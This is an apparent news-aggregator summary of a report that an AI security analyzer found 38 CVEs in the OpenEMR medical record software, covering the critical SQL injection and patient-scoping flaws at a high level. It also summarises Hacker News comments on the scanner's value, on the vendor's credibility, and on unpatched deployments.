AI uncovers 38 vulnerabilities in largest open source medical record software

· open-source · Source ↗

TLDR

  • AISLE’s AI analyzer found 38 CVEs in OpenEMR in Q1 2026, including 3 critical SQL injections, across a codebase serving 200M patients.

Key Takeaways

  • OpenEMR is used by 100,000+ medical providers across 34 languages; it holds ONC certification under all 13 Privacy and Security criteria.
  • 38 CVEs in one quarter versus 23 from a dedicated human audit in 2018; more than half of all OpenEMR GitHub security advisories in the period.
  • The two CVSS 10.0 findings were SQL injections: one in the Patient REST API _sort parameter, one in the Immunization module’s web UI, both enableing full DB dump and potential RCE.
  • A third critical flaw, CVE-2026-24487, was architectural: FhirCareTeamService never declared the patient-scoping interface, so patient-scoped OAuth2 tokens returned data for every patient in the system.
  • Fixes shipped in OpenEMR 8.0.0 within four weeks of first disclosure; AISLE PRO now runs at code-review stage to catch new vulnerabilities before merge.

Hacker News Comment Review

  • Commenters broadly agree all 38 findings fall into four well-known categories (SQLi, XSS, IDOR, path traversal), framing this as evidence AI scanners are effective at exhausting low-hanging fruit that human reviewers miss under time pressure.
  • Skepticism surfaced about AISLE’s credibility: one commenter flagged a prior AISLE blog post as misleading coattail-riding on Mythos, calling for more methodological detail on how findings were actually produced.
  • A practical concern runs under the thread: most OpenEMR deployments are on older, unpatched versions, meaning disclosed CVEs remain live in production for the majority of affected providers regardless of the upstream fix velocity.

Notable Comments

  • @simonw: notes every single finding maps to a known vuln class, calling it “a pretty good example of the value of AI security scanners” even on strong dev teams.
  • @mbesto: flags the real-world exposure gap: most providers running OpenEMR are likely on older versions where these CVEs are already public but unpatched.
  • @jjwiseman: questions AISLE’s credibility directly, citing a prior misleading blog post comparing to Mythos as reason to want more detail on methodology.

Original | Discuss on HN

Featured in briefings

Related coverage